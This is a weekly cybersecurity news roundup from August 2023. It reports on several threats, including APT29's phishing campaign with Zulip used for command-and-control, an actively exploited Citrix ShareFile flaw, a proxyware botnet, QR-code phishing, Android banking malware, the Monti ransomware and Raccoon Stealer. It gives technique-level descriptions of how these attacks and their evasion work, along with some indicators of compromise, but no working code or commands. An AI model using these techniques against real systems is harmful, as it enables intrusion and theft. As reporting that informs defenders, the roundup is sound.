Thursday, August 17th, 2023
Cybersecurity Week in Review (18/08/2023)
Russian Hackers Use Zulip Chat App for Covert C&C in Diplomatic Phishing Attacks
An ongoing campaign targeting ministries of foreign affairs of NATO-aligned countries points to the involvement of Russian threat actors.
The phishing attacks feature PDF documents with diplomatic lures, some of which are disguised as coming from Germany, to deliver a variant of a malware called Duke, which has been attributed to APT29 (aka BlueBravo, Cloaked Ursa, Cozy Bear, Iron Hemlock, Midnight Blizzard, and The Dukes).
The threat actor used Zulip – an open-source chat application – for command-and-control, to evade and hide its activities behind legitimate web traffic.
APT29’s use of invitation themes has been previously reported by Lab52, which documented an attack that impersonates the Norwegian embassy to deliver a DLL payload that’s capable of contacting a remote server to fetch additional payloads.
The use of the domain “bahamas.gov[.]bs” in both the intrusion sets further solidifies this link.
Command-and-control is facilitated by making use of Zulip’s API to send victim details to an actor-controlled chat room (toyy.zulipchat[.]com) as well as to remotely commandeer the compromised hosts.
It’s worth noting that the abuse of Zulip is par for the course with the state-sponsored group, which has a track record of leveraging a wide array of legitimate internet services such as Google Drive, Microsoft OneDrive, Dropbox, Notion, Firebase, and Trello for C2.
APT29’s primary targets are governments and government subcontractors, political organizations, research firms, and critical industries in the U.S. and Europe. But in an interesting twist, an unknown adversary has been observed employing its tactics to breach Chinese-speaking users with Cobalt Strike.
The development comes as the Computer Emergency Response Team of Ukraine (CERT-UA) warned of a new set of phishing attacks against state organizations of Ukraine using a Go-based open-source post-exploitation toolkit called Merlin. The activity is being tracked under the moniker UAC-0154.
The war-torn country has also faced sustained cyber assaults from Sandworm, an elite hacking unit affiliated to Russian military intelligence, primarily intended to disrupt critical operations and gather intelligence to gain a strategic advantage.
According to a recent report from the Security Service of Ukraine (SBU), the threat actor is said to have unsuccessfully attempted to gain unauthorized access to Android tablets possessed by Ukrainian military personnel for planning and performing combat missions.
“The capture of devices on the battlefield, their detailed examination, and the use of available access, and software became the primary vector for the initial access and malware distribution,” the security agency said.
Some of the malware strains include NETD to ensure persistence, DROPBEAR to establish remote access, STL to gather data from the Starlink satellite system, DEBLIND to exfiltrate data, the Mirai botnet malware. Also used in the attacks is a TOR hidden service to access the device on the local network via the Internet.
CISA Adds Citrix Sharefile Flaw to KEV Catalog Due to In-the-Wild Attacks
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical security flaw in Citrix ShareFile storage zones controller to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active in-the-wild exploitation.
Tracked as CVE-2023-24489 (CVSS score: 9.8), the shortcoming has been described as an improper access control bug that, if successfully exploited, could allow an unauthenticated attacker to compromise vulnerable instances remotely.
The problem is rooted in ShareFile’s handling of cryptographic operations, enabling adversaries to upload arbitrary files, resulting in remote code execution.
“This vulnerability affects all currently supported versions of customer-managed ShareFile storage zones controller before version 5.11.24,” Citrix said in an advisory released in June. Dylan Pindur of Assetnote has been credited with discovering and reporting the issue.
It’s worth noting that the first signs of exploitation of the vulnerability emerged toward the end of July 2023.
The identity of the threat actors behind the attacks is unknown, although the Cl0p ransomware gang has taken a particular interest in taking advantage of zero-days in managed file transfer solutions such as Accellion FTA, SolarWinds Serv-U, GoAnywhere MFT, and Progress MOVEit Transfer in recent years.
The application uses AES encryption with CBC mode and PKCS7 padding but does not correctly validate decrypted data. This oversight allows attackers to generate valid padding and execute their attack, leading to unauthenticated arbitrary file upload and remote code execution.
Federal Civilian Executive Branch (FCEB) agencies have been mandated to apply vendor-provided fixes to remediate the vulnerability by September 6, 2023.
The development comes as security alarms have been raised about active exploitation of CVE-2023-3519, a critical vulnerability affecting Citrix’s NetScaler product, to deploy PHP web shells on compromised appliances and gain persistent access.
Massive 400,000 Proxy Botnet Built with Stealthy Malware Infections
Researchers have uncovered a massive campaign that delivered proxy server apps to at least 400,000 Windows systems. The devices act as residential exit nodes without users’ consent and a company is charging for the proxy traffic running through the machines.
Residential proxies are valuable to cybercriminals because they can help with deploying large-scale credential stuffing attacks from fresh IP addresses. They also have legitimate purposes like ad verification, data scraping, website testing, or privacy-enhancing rerouting.
Some proxy companies sell access to residential proxies and offer monetary rewards to users who agree to share their bandwidth. The 400,000-node proxy network was built by using malicious payloads that delivered the proxy application.
Despite the company behind the botnet claiming that users gave their consent, the researchers discovered that the proxy was installed silently on the devices. The same company controlled exit nodes created by a malicious payload called AdLoad that targeted macOS systems, which AT&T reported last week.
In fact, the two Go-based binaries (for macOS and Windows) appear to originate from the same source code, however, the Windows proxy client evades antivirus detection due to using a valid digital signature.
The infection starts with the execution of a loader hidden in cracked software and games, which downloads and installs the proxy application automatically in the background without user interaction. The malware authors use Inno Setup with specific parameters that hide any indicators of the installation process and all typical user prompts.
During the installation of the proxy client, the malware sends specific parameters, which are also relayed to the command and control (C2) server so that the new client can be registered and incorporated into the botnet.
The proxy client establishes persistence on the infected system by creating a registry key to activate it when the system boots and a by adding a scheduled task that to check for new client updates.
It is recommended to look for a “Digital Pulse” executable at “%AppData%\” or a similarly named Registry key on “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\.” If any are present, the researchers recommend removing them.
The name of the scheduled task is “DigitalPulseUpdateTask” and should also be deleted to eliminate the chance of the client update mechanism re-introducing the infection.
Finally, avoid downloading pirated software and running executables sourced from dubious locations like peer-to-peer networks or site offering premium software free of charge.
Signs of proxyware infection include performance and internet speed degradation, unexpected network traffic patterns, frequent communication with unknown IPs or domains, and system alerts.
Cleaning Products Giant Clorox Takes Systems Offline Following Cyberattack
Cleaning products manufacturer and marketer Clorox Company says it has taken certain systems offline in response to a cyberattack.
“The Clorox Company recently identified unusual activity on our IT systems. Upon detection, we immediately took steps to stop the activity and took certain systems offline,” the company said in response to an inquiry.
Clorox also said that the affected systems remain offline as it is working on adding more “protections and hardening measures to further secure them”.
“As a result, some operations are temporarily impaired. We are following our business continuity plans and implementing workarounds where possible,” the company explained.
In a Form 8-K filing with the Securities and Exchange Commission (SEC), the company said it has implemented workarounds to enable offline operations and continue servicing customers, but disruptions are expected to continue.
Clorox also told the SEC that it has informed law enforcement of the incident and that it is working with third-party cybersecurity experts to investigate the attack and restore its operations.
The company did not provide additional information on the type of cyberattack that it has fallen victim to, but taking systems offline is typically the immediate response to a ransomware infection.
Clorox did not say whether any data was stolen from its systems, nor how long it might take to restore the impacted systems.
“The investigation into the nature and scope of the incident remains ongoing and is in its very early stages. Our team is working diligently to restore systems safely and quickly, and we will ensure all suppliers and customers are updated as appropriate,” the company said.
Based in Oakland, California, Clorox makes and sells consumer and professional cleaning products, including Brita, Glad, Green Works Cleaning Products, Kingsford, Liquid-Plumr, Pine-Sol, and Tilex. The company has locations in 25 countries and territories worldwide and a market presence in over 100 countries.
Major U.S. Energy Organization Targeted in QR Code Phishing Attack
A phishing campaign was observed predominantly targeting a notable energy company in the US, employing QR codes to slip malicious emails into inboxes and bypass security.
Roughly one-third (29%) of the 1,000 emails attributed to this campaign targeted a large US energy company, while the remaining attempts were made against firms in manufacturing (15%), insurance (9%), technology (7%), and financial services (6%).
This is the first time that QR codes have been used at this scale, indicating that more phishing actors may be testing their effectiveness as an attack vector. The attack begins with a phishing email that claims the recipient must take action to update their Microsoft 365 account settings.
The emails carry PNG or PDF attachments featuring a QR code the recipient is prompted to scan to verify their account. The emails also state that the target must complete this step in 2-3 days to add a sense of urgency.
The threat actors use QR codes embedded in images to bypass email security tools that scan a message for known malicious links, allowing the phishing messages to reach the target’s inbox. To evade security, the QR codes in this campaign also use redirects in Bing, Salesforce, and Cloudflare’s Web3 services to redirect the targets to a Microsoft 365 phishing page.
Hiding the redirection URL in the QR code, abusing legitimate services, and using base64 encoding for the phishing link all help evade detection and get through email protection filters.
QR codes have been used in phishing campaigns, albeit on a smaller scale, in the past, including one in France and one in Germany. Scammers have also employed QR codes to trick people into scanning them and redirect them to malicious websites that attempt to steal their money.
In January 2022, the FBI warned that cybercriminals increasingly use QR codes to steal credentials and financial information. Despite their effectiveness in bypassing protections, QR codes still require the victim to take action to get compromised, which is a decisive mitigating factor working in favor of well-trained personnel. Also, most QR code scanners on modern smartphones will ask the user to verify the destination URL before launching the browser as a protective step.
Apart from training, organizations should use image recognition tools as part of their phishing protection measures, although these are not guaranteed to catch all QR code threats.
Gigabud RAT Android Banking Malware Targets Institutions Across Countries
Account holders of numerous financial institutions in Thailand, Indonesia, Vietnam, the Philippines, and Peru are being targeted by an Android banking malware called Gigabud RAT.
One of Gigabud RAT’s unique features is that it doesn’t execute any malicious actions until the user is authorized into the malicious application by a fraudster, which makes it harder to detect. Instead of using HTML overlay attacks, Gigabud RAT gathers sensitive information primarily through screen recording.
Gigabud RAT was first documented in January 2023 after it was spotted impersonating bank and government apps to siphon sensitive data. It’s known to be active in the wild since at least July 2022.
A second variant of the malware minus the RAT capabilities was also identified. Dubbed Gigabud.Loan, it comes under the guise of a loan application that’s capable of exfiltrating user-input data. The targets were individuals lured into filling out a bank card application form to obtain a low-interest loan. The victims are convinced to provide personal information during the application process.
Both malware versions are spread via phishing websites, the links to which are delivered to victims via SMS or instant messages on social media networks. Gigabud.Loan is also distributed directly in the form of APK files sent through messages on WhatsApp. Targets who are approached on social media are often coerced into visiting the sites under the pretext of completing a tax audit and claiming a refund.
While Android devices have the “Install from Unknown Sources” setting disabled by default as a security measure to prevent the installation of apps from untrusted sources, the operating system allows other apps on installed on the device, such as web browsers, email clients, file managers, and messaging apps, to request the “REQUEST_INSTALL_PACKAGES” permission.
Should a user grant permission to such apps, it allows the threat actors to install rogue APK files while bypassing the “Install from Unknown Sources” option.
Gigabud functions a lot like other Android banking trojans by requesting for accessibility services permissions to perform screen capturing and logging keystrokes. It’s also equipped to replace bank card numbers in clipboards and perform automated fund transfers through remote access.
On the other hand, Gigabud.Loan functions as a tool to collect personal information such as full name, identity number, national identity document photo, digital signature, education, income info, bank card information, and phone number under the guise of submitting a loan request to the bank.
Monti Ransomware Returns with New Linux Variant and Enhanced Evasion Tactics
The threat actors behind the Monti ransomware have resurfaced after a two-month break with a new Linux version of the encryptor in its attacks targeting government and legal sectors.
Monti emerged in June 2022, weeks after the Conti ransomware group shut down its operations, deliberately imitating the tactics and tools associated with the latter, including its leaked source code. The new version, is a departure of sorts, exhibiting significant changes from its other Linux-based predecessors. Unlike the earlier variant, which is primarily based on the leaked Conti source code, this new version employs a different encryptor with additional distinct behaviors.
Analysis has revealed that while the older iterations had a 99% similarity rate with Conti, the latest version has only a 29% similarity rate, suggesting an overhaul.
Some of the crucial changes include the addition of a ‘–whitelist’ parameter to instruct the locker to skip a list of virtual machines as well as the removal of command-line arguments –size, –log, and –vmlist.
The Linux variant is also designed to tamper with the motd (aka message of the day) file to display the ransom note, employ AES-256-CTR encryption instead of Salsa20, and solely rely on the file size for its encryption process.
In other words, files larger than 1.048 MB but smaller than 4.19 MB will only have the first 100,000 (0xFFFFF) bytes of the file encrypted, while those exceeding 4.19 MB have a chunk of their content locked depending on the outcoming of a Shift Right operation.
Files that have a size smaller than 1.048 MB will have all their contents encrypted.
“It’s likely that the threat actors behind Monti still employed parts of the Conti source code as the base for the new variant, as evidenced by some similar functions, but implemented significant changes to the code — especially to the encryption algorithm,” the researchers said.
“Furthermore, by altering the code, Monti’s operators are enhancing its ability to evade detection, making their malicious activities even more challenging to identify and mitigate.”
Charming Kitten Targets Iranian Dissidents with Advanced Cyber Attacks
Germany’s Federal Office for the Protection of the Constitution (BfV) has warned of cyber attacks targeting Iranian persons and organizations in the country since the end of 2022.
“The cyber attacks were mainly directed against dissident organizations and individuals – such as lawyers, journalists, or human rights activists – inside and outside Iran,” the agency said in an advisory.
The intrusions have been attributed to a threat actor called Charming Kitten, which is also tracked under the names APT35, Mint Sandstorm, TA453, and Yellow Garuda.
While Iranian nation-state actors lag behind their Russian and Chinese counterparts in sophistication, they have demonstrated a continued advancement of tools and techniques, adding an arsenal of custom malware to facilitate information gathering and rapidly exploiting n-day security flaws to obtain initial access.
Charming Kitten, in particular, has a long, storied history of leveraging elaborate social engineering and fictitious online identities that are tailor-made to target victims. It also impersonates real journalists and NGO employees in a bid to build rapport and increase the likelihood of success of the attacks.
Once a successful contact is made, the hacking crew has been observed sending links to an online video chat that, when clicked, urge victims to enter their login information on a phishing page, effectively resulting in credential theft. The phishing site impersonates a legitimate online service provider such as Google or Microsoft.
“If an online video chat occurs, it serves to conceal the attack,” BfV said. “After logging in to the victim’s user account from a C2 server6, the attacker is able to download the entire user data, e.g. by means of Google Takeout.”
It’s worth noting that the Google Threat Analysis Group (TAG), in August 2022, detailed a malware called HYPERSCRAPE used by the threat actor to retrieve user data from Gmail, Yahoo!, and Microsoft Outlook accounts.
The attacks also mirror prior findings, which disclosed a credential phishing campaign aimed at human rights activists, journalists, researchers, academics, diplomats, and politicians working in the Middle East around the same time.
Discord.io Confirms Breach After Hacker Steals Data of 760K Users
The Discord.io custom invite service has temporarily shut down after suffering a data breach exposing the information of 760,000 members.
Discord.io is not an official Discord site but a third-party service allowing server owners to create custom invites to their channels. Most of the community was built around the service’s Discord server, with over 14,000 members.
Yesterday, a person known as ‘Akhirah’ began offering the Discord.io database for sale on the new Breached hacking forums. As proof of the theft, the threat actor shared four user records from the database.
For those unfamiliar with the new Breached, it is the rebirth of a popular cybercrime forum known for the sale and leaking of data stolen in data breaches.
The most sensitive information in the breach is a member’s username, email address, billing address (small number of people), salted and hashed password (small number of people), and Discord ID.
“This information is not private and can be obtained by anyone sharing a server with you. Its inclusion in the breach does, however, mean that other people might be able to link your Discord account to a given email address,” Discord.io explained about the leaking of Discord IDs.
Discord.io has confirmed the authenticity of the breach in a notice to its Discord server and website and has begun temporarily shutting down its services in response.
“Discord.io has suffered a data breach. We are stopping all operations for the foreseeable future,” reads a message on the service’s Discord server.
“For more information, please refer to our #breah-notification channel. We’ll be updating our website soon with a copy of this message.”
The website for Discord.io contains a timeline explaining that they first learned of the data breach after seeing the post on the hacking forum.
Soon after, they confirmed the authenticity of the leaked data and began shutting down its services and canceling all paid memberships. Discord.io says they have not been contacted by the individual behind the breach and have not shared any information on how they were breached.
Raccoon Stealer Malware Returns With New Stealthier Version
The developers of Raccoon Stealer information-stealing malware have ended their 6-month hiatus from hacker forums to promote a new 2.3.0 version of the malware to cyber criminals.
Raccoon is one of the most well-known and widely used information-stealing malware families, having been around since 2019, sold via a subscription model for $200/month to threat actors. The malware steals data from over 60 applications, including login credentials, credit card information, browsing history, cookies, and cryptocurrency wallet accounts.
The project entered a period of uncertainty in October 2022, when its primary author, Mark Sokolovsky, was arrested in the Netherlands, and the FBI took down the then malware-as-a-service’s infrastructure.
In a new post to a hacker forum, the malware’s current authors informed the cybercriminal community that they’re back, having spent their time “working tirelessly” to bring them new features that will enrich the user experience.
These new features were implemented after “customer” feedback, requests, and cybercrime trends, aiming to keep the malware in the top tier of the info-stealers market.
Raccoon 2.3.0 has introduced several “quality of life” and OpSec improvements that make it easier and safer to use, making it easier to use for less skilled threat actors and less likely for them to be traced by researchers and law enforcement.
First, a new quick search tool in the Raccoon Stealer dashboard allows hackers to easily find specific stolen data and retrieve credentials, documents, or other stolen data from massive datasets.
Secondly, the new Raccoon version features a system that counters suspicious activities that might be related to security-assisting bots, like multiple access events generated from the same IP. In those cases, Raccoon will automatically delete the corresponding records and update all client pads accordingly.
The user can now see the activity profile score of each IP address right from the malware’s dashboard, where green, yellow, and red smiley icons indicate the probability of bot activity.
A third important new feature incorporated as a protective measure against security researchers is a reporting system that detects and blocks IPs used by crawlers and bots that cyber-intelligence firms use to monitor Raccoon’s traffic. Finally, a new Log Stats panel gives users a “quick-glance” overview of their operations, the most successfully targeted regions, the number of breached computers, etc.
Information stealers constitute a massive threat to both home users and businesses, as their widespread adoption by the cybercrime community ensures payloads are through a myriad of channels, reaching a large and diverse audience.